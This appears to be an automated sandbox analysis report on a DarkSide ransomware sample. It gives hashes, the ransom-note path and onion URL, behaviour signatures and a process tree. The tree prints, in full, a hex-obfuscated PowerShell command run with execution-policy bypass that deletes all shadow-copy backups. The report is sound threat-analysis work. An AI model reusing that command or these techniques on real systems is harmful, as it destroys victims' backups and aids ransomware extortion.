Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
28-07-2024 02:28
Static task
static1
Behavioral task
behavioral1
Sample
a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe
Resource
win10v2004-20240709-en
General
-
Target
a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe
-
Size
166KB
-
MD5
be1c18efa764b1b32421b6beb57cd3e9
-
SHA1
9fff40b4653ab368e04e398d9c54a1aa3a320d49
-
SHA256
a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774
-
SHA512
f35e3f123f4b0378626de52035390d2b8c9cf42f5b1882c66d8a79c58cd798a89506fb402a93a7ceaba1078226d7eba80e9c8a93321fc0a17e4e012fc8b15824
-
SSDEEP
3072:o/0Lu+FKdYM69P6padn/DDonc8oOgajAnPvNHwcW0m1QTj:o/d+FKdYMQPrdn/HovAnlwx0cC
Malware Config
Extracted
C:\Users\Admin\README.6caf1429.TXT
darkside
http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Renames multiple (172) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Executes dropped EXE 1 IoCs
pid Process 2800 azami.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 2872 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\6caf1429.BMP" azami.exe Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\6caf1429.BMP" azami.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language azami.exe -
Modifies Control Panel 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Control Panel\Desktop\WallpaperStyle = "10" azami.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\6caf1429 azami.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\6caf1429\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\6caf1429.ico" azami.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.6caf1429 azami.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.6caf1429\ = "6caf1429" azami.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\6caf1429\DefaultIcon azami.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2872 powershell.exe 2800 azami.exe 2800 azami.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2800 azami.exe Token: SeSecurityPrivilege 2800 azami.exe Token: SeTakeOwnershipPrivilege 2800 azami.exe Token: SeLoadDriverPrivilege 2800 azami.exe Token: SeSystemProfilePrivilege 2800 azami.exe Token: SeSystemtimePrivilege 2800 azami.exe Token: SeProfSingleProcessPrivilege 2800 azami.exe Token: SeIncBasePriorityPrivilege 2800 azami.exe Token: SeCreatePagefilePrivilege 2800 azami.exe Token: SeBackupPrivilege 2800 azami.exe Token: SeRestorePrivilege 2800 azami.exe Token: SeShutdownPrivilege 2800 azami.exe Token: SeDebugPrivilege 2800 azami.exe Token: SeSystemEnvironmentPrivilege 2800 azami.exe Token: SeRemoteShutdownPrivilege 2800 azami.exe Token: SeUndockPrivilege 2800 azami.exe Token: SeManageVolumePrivilege 2800 azami.exe Token: 33 2800 azami.exe Token: 34 2800 azami.exe Token: 35 2800 azami.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeBackupPrivilege 1492 vssvc.exe Token: SeRestorePrivilege 1492 vssvc.exe Token: SeAuditPrivilege 1492 vssvc.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2292 wrote to memory of 2800 2292 a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe 30 PID 2292 wrote to memory of 2800 2292 a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe 30 PID 2292 wrote to memory of 2800 2292 a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe 30 PID 2292 wrote to memory of 2800 2292 a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe 30 PID 2800 wrote to memory of 2872 2800 azami.exe 32 PID 2800 wrote to memory of 2872 2800 azami.exe 32 PID 2800 wrote to memory of 2872 2800 azami.exe 32 PID 2800 wrote to memory of 2872 2800 azami.exe 32 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe"C:\Users\Admin\AppData\Local\Temp\a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Users\Admin\AppData\Local\Temp\azami.exe"azami.exe"2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1492
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
59KB
MD50ed51a595631e9b4d60896ab5573332f
SHA17ae73b5e1622049380c9b615ce3b7f636665584b
SHA256243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60
SHA5129bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53b1c5c77c8a45804207e49a2742b5d06
SHA1af37d23c070c1720e879cc5f10316722df03a60f
SHA256835fd0f59f156cbed05b05ff165ce70cce2f7a7574561516f1a6da16a902f044
SHA512257d2730647652638de51cd1599d0c9584a516f150bad6628b4a52d93f457290d776a243b0090944f40bbeceff240ab0afec2720e4abd53b1ddae47621ef7bbf
-
Filesize
1KB
MD5d4e176b40c4ea17f4870c34fad926d6e
SHA12cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0
SHA2567ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c
SHA512feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471